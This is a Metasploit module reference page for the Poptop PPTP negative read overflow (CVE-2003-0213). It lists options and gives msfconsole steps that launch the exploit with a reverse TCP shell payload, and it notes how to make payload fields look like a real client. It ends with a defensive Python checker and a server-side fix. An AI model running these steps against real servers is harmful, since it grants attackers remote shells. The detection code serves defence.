Poptop Negative Read Overflow
This is an exploit for the Poptop negative read overflow. It works against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. By default the server allows only 4 concurrent manager processes (the processes our code runs in), so you can have at most 4 shells open at once. With the current method of exploitation, our socket is closed before we are able to run code, which prevents the use of Findsock.
Exploit Rank
- Great
Exploit Authors
- spoonm < spoonm [at] no$email.com >
Vulnerability References
- CVE-2003-0213
- OSVDB-3293
- http://securityfocus.com/archive/1/317995
- http://www.freewebs.com/blightninjas/
Exploit Targets
- 0 - Linux Bruteforce (default)
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/pptp/poptop_negative_read
msf exploit(poptop_negative_read) > show payloads
msf exploit(poptop_negative_read) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(poptop_negative_read) > set LHOST [MY IP ADDRESS]
msf exploit(poptop_negative_read) > set RHOST [TARGET IP]
msf exploit(poptop_negative_read) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| RHOST | The target address |
| RPORT | The target port (default: 1723) |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExtraSpace | The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you to use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol; it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, i.e. Windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested. |
| Hostname | PPTP packet hostname |
| PreReturnLength | Space before we hit the return address. Affects PayloadSpace. |
| Proxies | Use a proxy chain |
| RetLength | Length of returns after payload. |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| Vendor | PPTP packet vendor |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
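The description above and the ExtraSpace option both turn on two properties of the PPTP control message: a Length field the server trusts, and the 64-byte Host Name and Vendor fields of the Start-Control-Connection-Request that a client would normally fill with text. The following is an added example, not code from the Metasploit module or from Poptop, showing the checks a sensor or a hardened server in front of TCP/1723 could apply to each assembled control message. It assumes the RFC 2637 control-header layout (12-byte header, magic cookie 0x1A2B3C4D, SCCRQ type 1, Host Name and Vendor at offsets 28 and 92) and treats a Length field smaller than the header already consumed as the malformed length the module's name refers to; the function names, the finding strings and all sample packets are constructed here.

```python
"""Sanity checks for PPTP control-connection messages (RFC 2637 framing).

Added example for this page, not code from the Metasploit module or Poptop.
Each assembled control message is checked for: a Length field smaller than
the 12-byte control header (assumed here to be the malformed length behind
the "negative read"), a wrong magic cookie, a Length that disagrees with the
bytes actually received, and SCCRQ Host Name / Vendor fields holding
non-text bytes instead of a client identifier.  All packets are constructed
samples built by build_sccrq(); field offsets follow RFC 2637.
"""
import struct
from typing import List, Optional

PPTP_HEADER_LEN = 12          # Length(2) MsgType(2) MagicCookie(4) CtrlType(2) Reserved0(2)
PPTP_MAGIC = 0x1A2B3C4D       # RFC 2637 magic cookie
MSG_TYPE_CONTROL = 1
CTRL_SCCRQ = 1                # Start-Control-Connection-Request
SCCRQ_FIELDS_OFF = PPTP_HEADER_LEN + 16   # after version/caps/channels/firmware
FIELD_LEN = 64                # Host Name and Vendor are 64 octets each, NUL padded


def _is_text_field(field: bytes) -> bool:
    """True if the field is printable ASCII followed only by zero padding."""
    text, _, padding = field.partition(b"\x00")
    return all(32 <= b < 127 for b in text) and not padding.strip(b"\x00")


def check_sccrq_fields(data: bytes) -> List[str]:
    """Flag Host Name / Vendor fields that do not look like client strings."""
    findings: List[str] = []
    for name, off in (("hostname", SCCRQ_FIELDS_OFF),
                      ("vendor", SCCRQ_FIELDS_OFF + FIELD_LEN)):
        field = data[off:off + FIELD_LEN]
        if len(field) < FIELD_LEN:
            findings.append(f"sccrq-{name}-truncated")
        elif not _is_text_field(field):
            findings.append(f"sccrq-{name}-not-text")
    return findings


def check_packet(data: bytes) -> List[str]:
    """Return findings for one assembled control message (empty list = clean)."""
    if len(data) < PPTP_HEADER_LEN:
        return [f"short-packet: {len(data)} bytes"]
    length, msg_type, magic, ctrl_type, _ = struct.unpack("!HHIHH", data[:PPTP_HEADER_LEN])
    findings: List[str] = []
    if length < PPTP_HEADER_LEN:
        # The server has already consumed 12 header bytes; a smaller Length
        # makes "bytes still to read" negative (assumed: the module's trigger).
        findings.append(f"negative-length: Length field {length} < {PPTP_HEADER_LEN}")
    if magic != PPTP_MAGIC:
        findings.append(f"bad-magic: 0x{magic:08x}")
    if length != len(data):
        findings.append(f"length-mismatch: field {length}, received {len(data)}")
    if msg_type == MSG_TYPE_CONTROL and ctrl_type == CTRL_SCCRQ:
        findings.extend(check_sccrq_fields(data))
    return findings


def build_sccrq(hostname: bytes, vendor: bytes, length_field: Optional[int] = None) -> bytes:
    """Construct a 156-byte SCCRQ; length_field overrides the Length header for test cases."""
    # protocol version 1.0, reserved, framing caps, bearer caps, max channels, firmware rev
    body = struct.pack("!HHIIHH", 0x0100, 0, 1, 1, 0xFFFF, 0)
    body += hostname.ljust(FIELD_LEN, b"\x00")[:FIELD_LEN]
    body += vendor.ljust(FIELD_LEN, b"\x00")[:FIELD_LEN]
    total = PPTP_HEADER_LEN + len(body)
    header = struct.pack("!HHIHH", total if length_field is None else length_field,
                         MSG_TYPE_CONTROL, PPTP_MAGIC, CTRL_SCCRQ, 0)
    return header + body


# Constructed samples, not captured traffic.
BENIGN = build_sccrq(b"WORKSTATION-01", b"Microsoft")
UNDERSIZED_LENGTH = build_sccrq(b"", b"", length_field=1)
BINARY_FIELDS = build_sccrq(bytes(range(0x80, 0xC0)), bytes(range(0x80, 0xC0)))

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("undersized-length", UNDERSIZED_LENGTH),
                       ("binary-fields", BINARY_FIELDS)):
        print(label, check_packet(pkt) or "clean")
```

The benign request passes cleanly; the request whose Length field is 1 is reported both as a negative length and as disagreeing with the bytes received; the request with 64 non-ASCII bytes in each string field is reported once per field, which is the signal the ExtraSpace option's note about making those fields "look like a real client" would otherwise defeat. A server-side fix for the same class of bug is the first check in check_packet: reject the message when Length is below the header size before computing how many bytes remain to read.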
